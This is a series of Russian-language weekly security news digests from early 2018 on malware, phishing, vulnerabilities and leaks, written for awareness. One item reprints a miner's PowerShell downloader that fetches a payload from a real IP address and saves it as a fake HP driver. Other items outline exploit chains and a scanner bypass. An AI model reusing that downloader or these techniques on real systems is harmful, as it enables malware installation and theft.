Представляем новости об актуальных технологиях фишинга и других атаках на человека cо 2 по 8 марта 2018 года.

Андрей Жаркевич
редактор, ИТ-руководитель

Вредоносное ПО

Android-малварь BankBot распространяется под видом приложения для доступа к онлайн-банкингу сразу нескольких российских кредитных организаций.

Троян обнаружен в приложении «ВСЕБАНКИ — Все банки в одном месте». После запуска он похищает логины, пароли и другую конфиденциальную информацию:

Вредонос ComboJack выявляет номера криптовалютных кошельков в буфере обмена Windows и подменяет их на номера злоумышленников.

1. ComboJack распространяется посредством фишинговых писем с PDF-вложением.
2. Если пользователь открывает PDF-файл, следом открывается RTF-файл, содержащий встроенный объект HTA, который пытается проэксплуатировать уязвимость CVE-2017-8579 в DirectX.
3. При успешной эксплуатации уязвимости файл HTA запускает ряд команд PowerShell, для загрузки и выполнения самораспаковывающегося архива (SFX).
4. SFX-файл загружает и запускает еще один защищенный паролем SFX, который и устанавливает ComboJack.

Обнаружен майнер, который выгружает из памяти ресурсоёмкие процессы, чтобы получить больше вычислительной мощности.

Майнер представляет собой PowerShell-скрипт, который маскируется под драйвер принтера, а после установки запускает программу для генерации Monero:

$HSST = "http://45.123.190.116"
$CALLBACK = $HSST
$DEFAULT_RFILE = "$HSST/files/hpw64"
$OTHERS_RFILE = "$HSST/files/hpw32"
$LFILE_NAME = "HPDriver.exe"
$LFILE_PATH = "$env:TMP\$LFILE_NAME"
$DOWNLOADER = New-Object System.Net.WebClient
$SYSTEM_BIT = [System.IntPtr]::Size
if ( $SYSTEM_BIT -eq 8 ) {
    $DOWNLOADER.DownloadFile($DEFAULT_RFILE, $LFILE_PATH)
} else {
    $DOWNLOADER.DownloadFile($OTHERS_RFILE, $LFILE_PATH)
}

Исполняемый файл не имеет цифровой подписи, но старается быть похожим на драйвер принтера HP:

Попав на устройство, он сканирует активные приложения и выгружает из памяти те, которые могут помешать ему максимально занять ЦП.

Код зловреда содержит список некритичных для работы Windows процессов, которые могут серьезно нагрузить компьютер. При этом скрипт ищет и завершает не только обычные программы, но и трояны, которые используются для генерации криптовалюты.

Почта, сайты и мессенджеры

Злоумышленники используют бэкдоры во вредоносных документах Word для атаки на организации гуманитарной помощи по всему миру.

Чтобы убедить пользователя выполнить макросы, мошенники оформляют документы с использованием стилей популярных почтовых сервисов:

Вредоносные файлы распространяются в фишинговых письмах, содержащих документ с макросами. При активации макроса на компьютер устанавливается бэкдор Syscon, закодированный в данных Visual Basic Script.

Торрент-трекер b-tor(.)ru раздаёт майнер Монеро вместо торрентов.

На странице загрузки вместо торрента отображается zip-архив с таким же именем. После распаковки пользователю предлагается запустить исполняемый файл, содержащийся в архиве. Если пользователь согласится и запустит вредонос, тот скачает настоящий торрент-файл, а вместе с ним майнер криптовалюты Monero под названием XMRig.

Уязвимости

Мобильное приложение GetContact делает общедоступными личные данные своих пользователей, поэтому их могут использовать киберпреступники.

При установке приложения пользователь соглашается представить на всеобщее обозрение свои данные, а взамен получает возможность определить личность звонящего и узнать другие подробности без его ведома. В положении о конфиденциальности GetContact сказано, что приложение может предоставлять персональные и корпоративные данные, в том числе аккаунты социальных сетей, адреса электронной почты и IP-адреса, а также делиться информацией из сторонних приложений. Кроме того, документом предусмотрена передача сведений третьим лицам, что дает разработчикам право продать базу собранных контактов.

Пользователи свободного консольного торрент-клиента rTorrent стали жертвой вредоносной кампании. Используя уязвимость в программе, злоумышленники загружают на компьютеры пользователей майнеры криптовалюты Monero.

Для загрузки эксплуатируется особенность реализации протокола XML-RPC в торрент-клиенте, в частности включенный метод execute, позволяющий выполнить произвольный shell-код на целевой системе.

Уязвимость в соцсети «ВКонтакте» позволяет читать личные сообщения случайных пользователей с помощью сервиса статистики SimilarWeb.

В платной версии SimilarWeb есть функция просмотра 300 самых популярных материалов сайта для анализа посещаемости. Указав «ВКонтакте» в качестве сайта для анализа, можно получить ссылки на личные сообщения 300 случайных пользователей.

По словам представителей «ВКонтакте», уязвимость не связана с проблемой в соцсети, а создана разработчиками, имевшими доступ к API.

«Мы предполагаем, что некоторые разработчики могли злоупотребить этими правами и по какой-то причине передать данные в SimilarWeb. Важно отметить, что таким образом было получено только 400 токенов, то есть известно 400 пользователей, которые осознанно передали небезопасному приложению доступ к своим личным данным», — отметили представители ВКонтакте.

Кибервымогатели

Новый метод DDoS-атак Memcached используется для вымогательства.

DDoS-атаки с отражением трафика (DrDoS) с помощью уязвимых memcached-серверов впервые появились в конце февраля и побили все рекорды по мощности: одна из атак на сайт GitHub имела мощность в 1,7 Тб/сек.

Исследуя UDP-пакеты DDoS-атаки, специалисты обнаружили сообщение с требованием заплатить 50 монеро (около 17 000 долларов США) для прекращения атаки.

Умные устройства

Разработан набор инструментов для взлома и удаленного управления умными автомобилями.

Бэкдор под названием The Bicho работает на микроконтроллере PIC18F2580 и предназначен для атак на любые транспортные средства, оснащенные шиной CAN (Controller Area Network).

Для активации бэкдора злоумышленнику необходимо:

1. Подключить его к компьютеру и скачать вредоносные модули.
2. Получить физический доступ к OBD II-порту под рулевым колесом для установки в автомобиль.
3. После запуска бэкдор выполняет команды, получаемые через SMS.

Bicho может управлять фарами, газом, тормозами и даже вывести машину из строя, отключив электронный блок управления. Bicho также может автоматически атаковать автомобиль, когда тот находится рядом с конкретным местоположением, превышает заданную скорость или израсходовал определенное количество топлива.

Смарт-автомобиль может обмануть «умные» системы управления дорожным движением в США.

Машина может заставить систему «думать», что на перекрестке образовался затор. В результате система изменит алгоритм управления движением, замедлит скорость всего потока и даже заблокирует перекрестки.

Умные автомобили используют для взаимодействия с транспортной инфраструктурой протокол V2I, в одной из распространённых реализаций которого отсутствует защита от спуфинга. В результате автомобиль может отправлять системам управления движения повторяющиеся сообщения, выдавая себя за последнее прибывшее туда транспортное средство.

Неизвестный хакер в Ульяновске взломал «умную» автобусную остановку и вывел на мониторы кадры из компьютерной игры и фрагменты порнографического фильма.

Телеграм-канал Антифишинга

Анонсы дайджестов, наши исследования по психологии в безопасности, новости про фишинг и прочие цифровые атаки на людей.

Материалы, которые помогут вам, вашим коллегам и близким оставаться в безопасности.

Представляем новости об актуальных технологиях фишинга и других атаках на человека c 23 февраля по 1 марта 2018 года.

Андрей Жаркевич
редактор, ИТ-руководитель

Почта, сайты и мессенджеры

Из-за ошибки в Facebook вместе с приглашением на страницу пользователи получали имя и другие данные пригласившего их администратора:

Исследователь, обнаруживший ошибку, получил от Facebook 2500 долларов США, а проблема вскоре была устранена.

Крупные американские предприятия из списка Fortune 500 стали жертвами массовой фишинговой кампании:

В фишинговом письме содержалась ссылка, похожая на вложенный деловой документ, которая направляла жертву на поддельный портал DocuSign. Чтобы письма выглядели правдоподобно, мошенники включали в них какие-нибудь сведения о нужной компании, находящиеся в открытом доступе:

По ссылке пользователю предлагалось выбрать своего почтового провайдера и ввести данные для доступа к почте, которые затем попадали к преступникам:

Затем, через поддельные письма ответственным сотрудникам, злоумышленники вынуждали жертв совершать денежные переводы на сторонние счета.

Вредоносное ПО

Зафиксировано массовое распространение вредоноса, который использует уязвимости в Adobe Flash Player.

Для распространения мошенники рассылают письма, содержащие ссылку на документ MS Word. При его просмотре пользователю рекомендуется отключить защищенный режим (разрешить редактирование):

При этом исполняется вредоносный шелл-код, который загружает и запускает на выполнение DLL-модуль.

Криптовымогатель Data Keeper работает по принципу «Вымогатель-как-сервис» (Ransomware-as-a-Service) и предлагается бесплатную копию всем, кто поможет в распространении.

Чтобы получить свою копию вируса, нужно зарегистрироваться на сайте, создать вредоносные файлы и организовать их распространение.

После запуска на компьютере жертвы Data Keeper шифрует все файлы и требует выкуп в биткоинах. Распространители вируса получают процент от выкупа.

Троян Coldroot для macOS не определяется антивирусными сканерами, внедряет в систему клавиатурный шпион и средство для удалённого доступа:

Coldroot выдает себя за аудиодрайвер Apple com.apple.audio.driver2.app, который при активации выводит стандартное окно аутентификации для ввода учетных данных macOS. Пользователь вводит свои данные, после чего вирус модифицирует системную базу данных TCC.db и выдаёт себе права для перехвата клавиатурного ввода.

Шифровальщик Thanatos стал первым вымогателем, который принимает выкуп в криптовалюте Bitcoin Cash.

Помимо Bitcoin Cash, шифровальщик предлагает жертве заплатить выкуп в Bitcoin или Ethereum. Код вредоноса содержит ошибки, из-за которых велика вероятность полной потери зашифрованных данных.

Вымогатель Annabelle имеет огромное количество вредоносных функций и требует около 55 тысяч рублей в биткоинах в качестве выкупа.

Кроме шифрования документов, Annabelle блокирует системы безопасности и службы Windows, отключает Защитника Windows и файрволл. На экран загрузки ОС размещается картинка с контактами создателя вредоноса и несколькими словами признательности неизвестным «коллегам» за вдохновение и идеи.

Вредонос RedDrop для Android способен использовать микрофон устройства для скрытой записи всего, что происходит вокруг, а затем загружать полученное аудио в Dropbox или Google Drive.

Проникнув на устройство пользователя, RedDrop собирает информацию о зараженном гаджете и передает ее на управляющий сервер, а затем устанавливает семь дополнительных приложений, отвечающих за другую вредоносную функциональность. После запуска зараженного приложения, малварь незаметно подписывает жертву на платные SMS-сервисы.

Смартфоны

Компания Cellebrite добавила в перечень своих услуг снятие защиты устройств Apple, включая iPhone, iPad и iPod под управлением iOS от 5 до 11 версии.

Услуга по разблокировке всех современных устройств Apple стоит 1500 долларов США. Для её получения устройство необходимо отправить в компанию.

Уязвимости

Уязвимости в BitTorrent-клиентах uTorrent Web и uTorrent Classic позволяют внедрить вредоносное ПО на компьютер пользователя и просматривать историю загрузок:

кликните, чтобы увеличить изображение

Атакующий может воспользоваться уязвимостью, спрятав в веб-страницах определенные команды, которые обращаются к RPC-серверам uTorrent. С их помощью можно загрузить вредоносную программу в папку на целевой системе или получить доступ к истории загрузок пользователя.

Криптовалюты

У Стива Возняка, соучредителя Apple, мошенническим путём похитили семь биткоинов. Кто-то купил их у него через интернет с помощью кредитной карты, а затем отменил платежную операцию. Кредитная карта оказалась краденой, поэтому получить деньги назад было невозможно. Возняк рассказал, что купил биткоины, когда они стоили 700 долларов, потери из-за кражи составили более 70 000 долларов.

Неизвестные злоумышленники похитили создателя криптовалюты Prizm Юрия Майорова, возили его некоторое время по городу, а затем заставили его перевести на другой кошелек 300 биткоинов. Кроме биткоинов у Юрия Майорова отняли $20 000, ноутбук и несколько iPhone.

Телеграм-канал Антифишинга

Анонсы дайджестов, наши исследования по психологии в безопасности, новости про фишинг и прочие цифровые атаки на людей.

Материалы, которые помогут вам, вашим коллегам и близким оставаться в безопасности.

Представляем новости об актуальных технологиях фишинга и других атаках на человека cо 16 по 22 февраля 2018 года.

Сергей Волдохин
sv@antiphish.ru


Андрей Жаркевич
редактор, ИТ-руководитель

Уязвимости

Устройства с iOS, macOS, tvOS и watchOS можно заблокировать или вывести из строя с помощью «текстовой бомбы».

Для эксплуатации уязвимости достаточно отправить сообщение, содержащее символ ????? из языка телугу, в Messages, Safari, Slack, WhatsApp, Facebook Messenger, Outlook для iOS, Gmail и Twitter. Получив такое сообщение, устройства уходили в бесконечную перезагрузку. Telegram и Skype не подвержены этой проблеме.

На текущий момент Apple уже выпустила патч к уязвимости CVE-2018-4124 для всех операционных систем.

Видео: демонстрация эксплуатации уязвимости

Уязвимость оператора связи T-Mobile позволяла злоумышленникам получать доступ к персональным данным некоторых клиентов.

Используя эту ошибку, злоумышленники могут позвонить в службу поддержки T-Mobile, выдать себя за клиента и инициировать замену SIM-карты и получить в распоряжение номер телефона, который затем могут использовать для кражи личности и управления сервисами жертвы. В том числе они могут изменить все пароли и перевести деньги со счетов бывшего владельца номера.

Видео: демонстрация уязвимости T-Mobile

Новейшая версия macOS может потерять пользовательские данные при использовании файловой системы APFS.

Проблема возникает, если используются разрежённые образы дисков (sparse disk images) на разделах APFS. Разрежённый образ при записи на него данных увеличивается в объёме, но когда место на разделе заканчивается, не может корректно синхронизироваться с диском и узнать, сколько свободного пространства на нем осталось. В результате пользователь может копировать данные в разреженный образ, предполагая, на нём есть место, а фактически, информация копируется в пустоту. При этом пользователя о нехватке сводного места никак не уведомляют.

Видео: демонстрация потери данных на разделе APFS

Механизм безопасности AntiMalware в Windows 10 прекращает сканирование файла после обнаружения нулевого символа ASCII 0x00:

Это позволяет злоумышленникам обойти защитный механизм системы, разместив вредоносный код после нулевого символа.

Обнаруженная в Windows 10 уязвимость позволяет добиться повышения привилегий в системе.

Проблема связана с удаленным вызовом процедуры (RPC) SvcMoveFileInheritSecurity. Используя ошибку в системе, злоумышленник может назначить любому файлу произвольный дескриптор безопасности и добиться повышения привилегий.

Сообщение о неисправимой уязвимости в Skype оказалось ошибкой.

Уязвимости был подвержен Skype для Windows версии 7.40 и ниже, но еще в октябре 2017 года разработчики Microsoft выпустили восьмую версию VoIP-мессенджера, где проблему устранили.

Утечки

Некорректно настроенный сервер службы доставки FedEx стал причиной утечки конфиденциальных данных 119 тысяч пользователей:

Копии паспортов, водительских удостоверения и других документов хранились на сервере компании Bongo International, купленной FedEx в 2014 году. Предположительно, после покупки о сервере и хранящихся на нём данных просто забыли.

Почта, сайты и мессенджеры

Операторы мошеннической кампании Coinhoarder использовали Google AdWords, чтобы направить пользователей на фишинговые ресурсы.

Злоумышленники приобрели домены, схожие по написанию с Blockchain.info, и разместили на них фишинговые сайты, с помощью которых собирали учётные данные пользователей, а затем похищали криптовалюту из их кошельков:

Вместо спама и вредоносной рекламы группировка использовала легитимную рекламу на платформе Google AdWords. Их фишинговые сайты были в топе поисковой выдачи по запросам, связанным с Bitcoin:

За три года злоумышленники заработали около 50 млн долларов.

Клиенты reg.ru стали жертвами мошеннической рассылки, в которой им предлагалось продлить их домены.

В письме сообщалось, что оплаченные период регистрации доменного имени заканчивается, и его необходимо срочно продлить:

Если пользователь нажимал на кнопку «Оплатить», он попадал на мошеннический сайт, где, ничего не подозревая, расставался с деньгами.

Cервис рассылок Mailchimp используется мошенниками для распространения банковского трояна Gootkit.

Жертва получает письмо со ссылкой на архив company.zip, якобы содержащий счёт-фактуру. Внутри архива находится сценарий JavaScript, загружающий вредоносный модуль:

Киберпреступники внедрили майнинговый скрипт на сайт газеты LA Times.

Внедрение вредоносного кода стало возможным из-за ошибки в конфигурации облачного хранилища Amazon Web Services S3, в результате которой любой пользователь мог получить к нему доступ.

Вредоносное ПО

В документы MS Word можно интегрировать фишинговые формы и скрытый майнер криптовалюты Monero.

Это стало возможным благодаря встраиванию iframe c видеороликом в файл документа.

1. Поскольку списка доверенных сервисов или доменов нет, злоумышленники могут разместить видео на своём домене и встраивать криптоджекинговый скрипт в документ. При запуске видео из такого документа движок Internet Exploree запустит и майнер.
2. Также злоумышленники могут использовать встраиваемый контент, чтобы добавить в файлы Word фишинговые формы. Для этого достаточно сделать видеоролик доступным только для авторизованных пользователей, заставив жертву ввести учетные данные своего аккаунта:

Вредонос OSX/Shlayer маскируется под обновление для Adobe Flash Player и распространяется через торрент-трекеры.

Когда пользователь сайта нажимает на magnet-ссылку, он получает сообщение с предложением скачать обновление:

Установившись в системе, Shlayer загружает дополнительные вредоносные или рекламные модули.

Файлы MSI используются для доставки вредоносного ПО на компьютеры пользователей.

С помощью файлов MSI злоумышленники могут обходить простые фильтры, которые включают более популярные типы исполняемых файлов: (com|exe|dll|js|vbs|…). Кроме того, файлы установщика Windows выглядят менее подозрительно.

Разработчик модов для авиатренажёра Microsoft Flight Simulator внедрил в новую версию одного из модов средство для хищения паролей.

Когда пользователи обнаружили в составе мода вредоносное ПО, разработчик заявил, что это часть DRM-защиты, которая запускается только если используется пиратская копия. После массового возмущения легальных покупателей мода вредонос был удалён из комплекта поставки.

Телеграм-канал Антифишинга

Анонсы дайджестов, наши исследования по психологии в безопасности, новости про фишинг и прочие цифровые атаки на людей.

Материалы, которые помогут вам, вашим коллегам и близким оставаться в безопасности.